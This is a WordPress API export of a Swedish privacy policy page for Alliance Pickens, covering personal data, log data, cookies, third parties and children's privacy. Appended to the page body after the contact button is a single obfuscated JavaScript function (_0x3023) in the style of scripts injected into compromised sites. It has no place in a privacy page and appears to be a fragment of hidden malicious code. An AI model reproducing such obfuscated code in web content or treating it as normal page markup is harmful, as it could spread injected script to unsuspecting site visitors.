{"id":7031,"date":"2020-10-28T14:32:35","date_gmt":"2020-10-28T14:32:35","guid":{"rendered":"http:\/\/alliancepickens.com\/sekretesspolicy\/"},"modified":"2020-12-09T20:36:47","modified_gmt":"2020-12-09T20:36:47","slug":"sekretesspolicy","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/","title":{"rendered":"Sekretesspolicy"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad:  December 9, 2020<\/p>\n<p>Alliance Pickens  (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;) driver Alliance Pickens webbplatsen (&#8220;Tj\u00e4nsten&#8221;).<\/p>\n<p>Denna sida informerar dig om v\u00e5ra policyer g\u00e4llande insamling, anv\u00e4ndning och utl\u00e4mnande av Personlig information n\u00e4r du anv\u00e4nder v\u00e5r Tj\u00e4nst.<\/p>\n<p>Vi kommer inte att anv\u00e4nda eller dela din information med n\u00e5gon f\u00f6rutom som beskrivs i denna sekretesspolicy.<\/p>\n<p>Vi anv\u00e4nder din Personliga Information f\u00f6r att tillhandah\u00e5lla och f\u00f6rb\u00e4ttra Tj\u00e4nsten. Genom att anv\u00e4nda Tj\u00e4nsten godk\u00e4nner du insamling och anv\u00e4ndning av information i enlighet med denna policy. Om inte annat definieras i denna sekretesspolicy, har termer som anv\u00e4nds i denna sekretesspolicy samma betydelser som i v\u00e5ra Villkor och villkor, \u00e5tkomliga p\u00e5  http:\/\/alliancepickens.com<\/p>\n<h3>Informationsinsamling och anv\u00e4ndning<\/h3>\n<p>Medan vi anv\u00e4nder v\u00e5r Tj\u00e4nst kan vi be dig att ge oss viss personligt identifierbar information som kan anv\u00e4ndas f\u00f6r att kontakta eller identifiera dig. Personligt identifierbar information (&#8220;Personlig information&#8221;) kan inkludera, men \u00e4r inte begr\u00e4nsad till:<\/p>\n<ul>\n<li>Namn<\/li>\n<li>E-postadress<\/li>\n<li>Telefonnummer<\/li>\n<\/ul>\n<h3>Loggdata<\/h3>\n<p>Vi samlar in information som din webbl\u00e4sare skickar n\u00e4r du bes\u00f6ker v\u00e5r Tj\u00e4nst (&#8220;Loggdata&#8221;). Denna loggdata kan inneh\u00e5lla information som datorns Internet Protocol (&#8220;IP&#8221;) adress, webbl\u00e4sartyp, webbl\u00e4sarversion, sidorna i v\u00e5r Tj\u00e4nst som du bes\u00f6ker, tid och datum f\u00f6r ditt bes\u00f6k, den tid som spenderas p\u00e5 dessa sidor och annan statistik.<\/p>\n<h3>Cookies<\/h3>\n<p>Cookies \u00e4r filer med liten m\u00e4ngd data, vilket kan innefatta en anonym unik identifierare. Cookies skickas till din webbl\u00e4sare fr\u00e5n en webbplats och lagras p\u00e5 din dators h\u00e5rddisk.<\/p>\n<p>Vi anv\u00e4nder &#8220;cookies&#8221; f\u00f6r att samla in information. Du kan instruera din webbl\u00e4sare att neka alla cookies eller att ange n\u00e4r en cookie skickas. Om du inte accepterar cookies kan du dock inte anv\u00e4nda vissa delar av v\u00e5r Tj\u00e4nst.<\/p>\n<h3>Tj\u00e4nsteleverant\u00f6rer<\/h3>\n<p>Vi kan anst\u00e4lla tredje part f\u00f6retag och privatpersoner f\u00f6r att underl\u00e4tta v\u00e5r Tj\u00e4nst, f\u00f6r att tillhandah\u00e5lla Tj\u00e4nsten f\u00f6r v\u00e5r r\u00e4kning, att utf\u00f6ra Service-relaterade tj\u00e4nster eller f\u00f6r att hj\u00e4lpa oss att analysera hur v\u00e5r Service anv\u00e4nds.<\/p>\n<p>Dessa tredje parter har tillg\u00e5ng till din Personliga Information endast f\u00f6r att utf\u00f6ra dessa uppgifter f\u00f6r v\u00e5r r\u00e4kning och \u00e4r skyldiga att inte avsl\u00f6ja eller anv\u00e4nda den f\u00f6r n\u00e5got annat \u00e4ndam\u00e5l.<\/p>\n<h3>S\u00e4kerhet<\/h3>\n<p>S\u00e4kerheten f\u00f6r din Personliga Information \u00e4r viktig f\u00f6r oss, men kom ih\u00e5g att ingen metod f\u00f6r \u00f6verf\u00f6ring via Internet, eller metod f\u00f6r elektronisk lagring \u00e4r 100% s\u00e4ker. Samtidigt som vi str\u00e4var efter att anv\u00e4nda kommersiellt acceptabla medel f\u00f6r att skydda din Personliga Information, kan vi inte garantera dess absoluta s\u00e4kerhet.<\/p>\n<h3>L\u00e4nkar till andra webbplatser<\/h3>\n<p>V\u00e5r Service kan inneh\u00e5lla l\u00e4nkar till andra webbplatser som inte drivs av oss. Om du klickar p\u00e5 en tredje parts l\u00e4nk kommer du att h\u00e4nvisas till den tredje partens webbplats. Vi rekommenderar dig starkt att granska sekretesspolicyn f\u00f6r varje webbplats du bes\u00f6ker.<\/p>\n<p>Vi har ingen kontroll \u00f6ver, och tar inget ansvar f\u00f6r inneh\u00e5ll, sekretesspolicy eller praxis f\u00f6r n\u00e5gon tredje parts webbplatser eller tj\u00e4nster.<\/p>\n<h3>Barns integritet<\/h3>\n<p>V\u00e5r Tj\u00e4nst riktar sig inte till n\u00e5gon under 18 \u00e5r (&#8220;Barn&#8221;).<\/p>\n<p>Vi samlar inte medvetet in personligt identifierbar information fr\u00e5n barn under 18 \u00e5r. Om du \u00e4r f\u00f6r\u00e4lder eller v\u00e5rdnadshavare och du \u00e4r medveten om att ditt barn har gett oss Personlig information, v\u00e4nligen kontakta oss. Om vi uppt\u00e4cker att ett barn under 18 har f\u00f6rsett oss med Personlig information, kommer vi att radera s\u00e5dan information fr\u00e5n v\u00e5ra servrar omedelbart.<\/p>\n<h3>Efterlevnad av lagar<\/h3>\n<p>Vi kommer att avsl\u00f6ja din Personliga Information d\u00e4r det kr\u00e4vs f\u00f6r att g\u00f6ra det enligt lag eller st\u00e4mning.<\/p>\n<h3>\u00c4ndringar av denna integritetspolicy<\/h3>\n<p>Vi kan komma att uppdatera v\u00e5r integritetspolicy d\u00e5 och d\u00e5. Vi kommer att meddela dig om eventuella \u00e4ndringar genom att publicera den nya sekretesspolicyn p\u00e5 denna sida.<\/p>\n<p>Du rekommenderas att granska denna integritetspolicy med j\u00e4mna mellanrum f\u00f6r eventuella \u00e4ndringar. \u00c4ndringar i denna sekretesspolicy \u00e4r effektiva n\u00e4r de l\u00e4ggs ut p\u00e5 den h\u00e4r sidan.<\/p>\n<h3>Kontakta oss<\/h3>\n<p>Om du har n\u00e5gra fr\u00e5gor om denna sekretesspolicy, kontakta <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">oss<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;) driver webbplatsen (&#8220;Tj\u00e4nsten&#8221;). Denna sida informerar dig om v\u00e5ra policyer g\u00e4llande insamling, anv\u00e4ndning och utl\u00e4mnande av Personlig information n\u00e4r du anv\u00e4nder v\u00e5r Tj\u00e4nst. Vi kommer inte att anv\u00e4nda eller dela din information med n\u00e5gon f\u00f6rutom som beskrivs i denna sekretesspolicy. Vi anv\u00e4nder din Personliga Information f\u00f6r att tillhandah\u00e5lla&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-7031","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sekretesspolicy - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sekretesspolicy - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;) driver webbplatsen (&#8220;Tj\u00e4nsten&#8221;). Denna sida informerar dig om v\u00e5ra policyer g\u00e4llande insamling, anv\u00e4ndning och utl\u00e4mnande av Personlig information n\u00e4r du anv\u00e4nder v\u00e5r Tj\u00e4nst. Vi kommer inte att anv\u00e4nda eller dela din information med n\u00e5gon f\u00f6rutom som beskrivs i denna sekretesspolicy. Vi anv\u00e4nder din Personliga Information f\u00f6r att tillhandah\u00e5lla&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:47+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/sekretesspolicy\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/sekretesspolicy\\\/\",\"name\":\"Sekretesspolicy - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:32:35+00:00\",\"dateModified\":\"2020-12-09T20:36:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/sekretesspolicy\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/sekretesspolicy\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/sekretesspolicy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sekretesspolicy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sekretesspolicy - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/","og_locale":"sv_SE","og_type":"article","og_title":"Sekretesspolicy - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;) driver webbplatsen (&#8220;Tj\u00e4nsten&#8221;). Denna sida informerar dig om v\u00e5ra policyer g\u00e4llande insamling, anv\u00e4ndning och utl\u00e4mnande av Personlig information n\u00e4r du anv\u00e4nder v\u00e5r Tj\u00e4nst. Vi kommer inte att anv\u00e4nda eller dela din information med n\u00e5gon f\u00f6rutom som beskrivs i denna sekretesspolicy. Vi anv\u00e4nder din Personliga Information f\u00f6r att tillhandah\u00e5lla&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:47+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/","url":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/","name":"Sekretesspolicy - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:32:35+00:00","dateModified":"2020-12-09T20:36:47+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/sekretesspolicy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Sekretesspolicy"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/7031","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=7031"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/7031\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=7031"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}